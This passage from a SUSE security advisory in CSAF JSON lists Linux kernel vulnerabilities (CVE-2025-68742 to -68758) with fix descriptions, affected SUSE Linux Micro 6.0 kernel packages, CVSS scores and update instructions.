update_effective_progs to fail\nand then changed the original prog into dummy_bpf_prog.prog in\npurge_effective_progs. Then a softirq came, and accessing the members of\ndummy_bpf_prog.prog in the softirq triggers invalid mem access.\n\nTo fix it, skip updating stats when stats is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68742",
"url": "https://www.suse.com/security/cve/CVE-2025-68742"
},
{
"category": "external",
"summary": "SUSE Bug 1255707 for CVE-2025-68742",
"url": "https://bugzilla.suse.com/1255707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68742"
},
{
"cve": "CVE-2025-68744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Free special fields when update [lru_,]percpu_hash maps\n\nAs [lru_,]percpu_hash maps support BPF_KPTR_{REF,PERCPU}, missing\ncalls to \u0027bpf_obj_free_fields()\u0027 in \u0027pcpu_copy_value()\u0027 could cause the\nmemory referenced by BPF_KPTR_{REF,PERCPU} fields to be held until the\nmap gets freed.\n\nFix this by calling \u0027bpf_obj_free_fields()\u0027 after\n\u0027copy_map_value[,_long]()\u0027 in \u0027pcpu_copy_value()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68744",
"url": "https://www.suse.com/security/cve/CVE-2025-68744"
},
{
"category": "external",
"summary": "SUSE Bug 1255709 for CVE-2025-68744",
"url": "https://bugzilla.suse.com/1255709"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68744"
},
{
"cve": "CVE-2025-68746",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68746"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra210-quad: Fix timeout handling\n\nWhen the CPU that the QSPI interrupt handler runs on (typically CPU 0)\nis excessively busy, it can lead to rare cases of the IRQ thread not\nrunning before the transfer timeout is reached.\n\nWhile handling the timeouts, any pending transfers are cleaned up and\nthe message that they correspond to is marked as failed, which leaves\nthe curr_xfer field pointing at stale memory.\n\nTo avoid this, clear curr_xfer to NULL upon timeout and check for this\ncondition when the IRQ thread is finally run.\n\nWhile at it, also make sure to clear interrupts on failure so that new\ninterrupts can be run.\n\nA better, more involved, fix would move the interrupt clearing into a\nhard IRQ handler. Ideally we would also want to signal that the IRQ\nthread no longer needs to be run after the timeout is hit to avoid the\nextra check for a valid transfer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68746",
"url": "https://www.suse.com/security/cve/CVE-2025-68746"
},
{
"category": "external",
"summary": "SUSE Bug 1255722 for CVE-2025-68746",
"url": "https://bugzilla.suse.com/1255722"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68746"
},
{
"cve": "CVE-2025-68750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: potential integer overflow in usbg_make_tpg()\n\nThe variable tpgt in usbg_make_tpg() is defined as unsigned long and is\nassigned to tpgt-\u003etport_tpgt, which is defined as u16. This may cause an\ninteger overflow when tpgt is greater than USHRT_MAX (65535). I\nhaven\u0027t tried to trigger it myself, but it is possible to trigger it\nby calling usbg_make_tpg() with a large value for tpgt.\n\nI modified the type of tpgt to match tpgt-\u003etport_tpgt and adjusted the\nrelevant code accordingly.\n\nThis patch is similar to commit 59c816c1f24d (\"vhost/scsi: potential\nmemory corruption\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68750",
"url": "https://www.suse.com/security/cve/CVE-2025-68750"
},
{
"category": "external",
"summary": "SUSE Bug 1255814 for CVE-2025-68750",
"url": "https://bugzilla.suse.com/1255814"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68750"
},
{
"cve": "CVE-2025-68753",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68753"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: add bounds check in put_user loop for DSP events\n\nIn the DSP event handling code, a put_user() loop copies event data.\nWhen the user buffer size is not aligned to 4 bytes, it could overwrite\nbeyond the buffer boundary.\n\nFix by adding a bounds check before put_user().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68753",
"url": "https://www.suse.com/security/cve/CVE-2025-68753"
},
{
"category": "external",
"summary": "SUSE Bug 1256238 for CVE-2025-68753",
"url": "https://bugzilla.suse.com/1256238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68753"
},
{
"cve": "CVE-2025-68757",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68757"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vgem-fence: Fix potential deadlock on release\n\nA timer that expires a vgem fence automatically in 10 seconds is now\nreleased with timer_delete_sync() from fence-\u003eops.release() called on last\ndma_fence_put(). In some scenarios, it can run in IRQ context, which is\nnot safe unless TIMER_IRQSAFE is used. One potentially risky scenario was\ndemonstrated in Intel DRM CI trybot, BAT run on machine bat-adlp-6, while\nworking on new IGT subtests syncobj_timeline@stress-* as user space\nreplacements of some problematic test cases of a dma-fence-chain selftest\n[1].\n\n[117.004338] ================================\n[117.004340] WARNING: inconsistent lock state\n[117.004342] 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 Tainted: G S U\n[117.004346] --------------------------------\n[117.004347] inconsistent {HARDIRQ-ON-W} -\u003e {IN-HARDIRQ-W} usage.\n[117.004349] swapper/0/0 [HC1[1]:SC1[1]:HE0:SE0] takes:\n[117.004352] ffff888138f86aa8 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: __timer_delete_sync+0x4b/0x190\n[117.004361] {HARDIRQ-ON-W} state was registered at:\n[117.004363] lock_acquire+0xc4/0x2e0\n[117.004366] call_timer_fn+0x80/0x2a0\n[117.004368] __run_timers+0x231/0x310\n[117.004370] run_timer_softirq+0x76/0xe0\n[117.004372] handle_softirqs+0xd4/0x4d0\n[117.004375] __irq_exit_rcu+0x13f/0x160\n[117.004377] irq_exit_rcu+0xe/0x20\n[117.004379] sysvec_apic_timer_interrupt+0xa0/0xc0\n[117.004382] asm_sysvec_apic_timer_interrupt+0x1b/0x20\n[117.004385] cpuidle_enter_state+0x12b/0x8a0\n[117.004388] cpuidle_enter+0x2e/0x50\n[117.004393] call_cpuidle+0x22/0x60\n[117.004395] do_idle+0x1fd/0x260\n[117.004398] cpu_startup_entry+0x29/0x30\n[117.004401] start_secondary+0x12d/0x160\n[117.004404] common_startup_64+0x13e/0x141\n[117.004407] irq event stamp: 2282669\n[117.004409] hardirqs last enabled at (2282668): [\u003cffffffff8289db71\u003e] _raw_spin_unlock_irqrestore+0x51/0x80\n[117.004414] hardirqs last disabled at (2282669): [\u003cffffffff82882021\u003e] sysvec_irq_work+0x11/0xc0\n[117.004419] softirqs last enabled at (2254702): [\u003cffffffff8289fd00\u003e] __do_softirq+0x10/0x18\n[117.004423] softirqs last disabled at (2254725): [\u003cffffffff813d4ddf\u003e] __irq_exit_rcu+0x13f/0x160\n[117.004426]\nother info that might help us debug this:\n[117.004429] Possible unsafe locking scenario:\n[117.004432] CPU0\n[117.004433] ----\n[117.004434] lock((\u0026fence-\u003etimer));\n[117.004436] \u003cInterrupt\u003e\n[117.004438] lock((\u0026fence-\u003etimer));\n[117.004440]\n *** DEADLOCK ***\n[117.004443] 1 lock held by swapper/0/0:\n[117.004445] #0: ffffc90000003d50 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: call_timer_fn+0x7a/0x2a0\n[117.004450]\nstack backtrace:\n[117.004453] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G S U 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 PREEMPT(voluntary)\n[117.004455] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER\n[117.004455] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023\n[117.004456] Call Trace:\n[117.004456] \u003cIRQ\u003e\n[117.004457] dump_stack_lvl+0x91/0xf0\n[117.004460] dump_stack+0x10/0x20\n[117.004461] print_usage_bug.part.0+0x260/0x360\n[117.004463] mark_lock+0x76e/0x9c0\n[117.004465] ? register_lock_class+0x48/0x4a0\n[117.004467] __lock_acquire+0xbc3/0x2860\n[117.004469] lock_acquire+0xc4/0x2e0\n[117.004470] ? __timer_delete_sync+0x4b/0x190\n[117.004472] ? __timer_delete_sync+0x4b/0x190\n[117.004473] __timer_delete_sync+0x68/0x190\n[117.004474] ? __timer_delete_sync+0x4b/0x190\n[117.004475] timer_delete_sync+0x10/0x20\n[117.004476] vgem_fence_release+0x19/0x30 [vgem]\n[117.004478] dma_fence_release+0xc1/0x3b0\n[117.004480] ? dma_fence_release+0xa1/0x3b0\n[117.004481] dma_fence_chain_release+0xe7/0x130\n[117.004483] dma_fence_release+0xc1/0x3b0\n[117.004484] ? _raw_spin_unlock_irqrestore+0x27/0x80\n[117.004485] dma_fence_chain_irq_work+0x59/0x80\n[117.004487] irq_work_single+0x75/0xa0\n[117.004490] irq_work_r\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68757",
"url": "https://www.suse.com/security/cve/CVE-2025-68757"
},
{
"category": "external",
"summary": "SUSE Bug 1255943 for CVE-2025-68757",
"url": "https://bugzilla.suse.com/1255943"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68757"
},
{
"cve": "CVE-2025-68758",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68758"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbacklight: led-bl: Add devlink to supplier LEDs\n\nLED Backlight is a consumer of one or multiple LED class devices, but\ndevlink is currently unable to create correct supplier-producer links when\nthe supplier is a class device. It creates instead a link where the\nsupplier is the parent of the expected device.\n\nOne consequence is that removal order is not correctly enforced.\n\nIssues happen for example with the following sections in a device tree\noverlay:\n\n // An LED driver chip\n pca9632@62 {\n compatible = \"nxp,pca9632\";\n reg = \u003c0x62\u003e;\n\n\t// ...\n\n addon_led_pwm: led-pwm@3 {\n reg = \u003c3\u003e;\n label = \"addon:led:pwm\";\n };\n };\n\n backlight-addon {\n compatible = \"led-backlight\";\n leds = \u003c\u0026addon_led_pwm\u003e;\n brightness-levels = \u003c255\u003e;\n default-brightness-level = \u003c255\u003e;\n };\n\nIn this 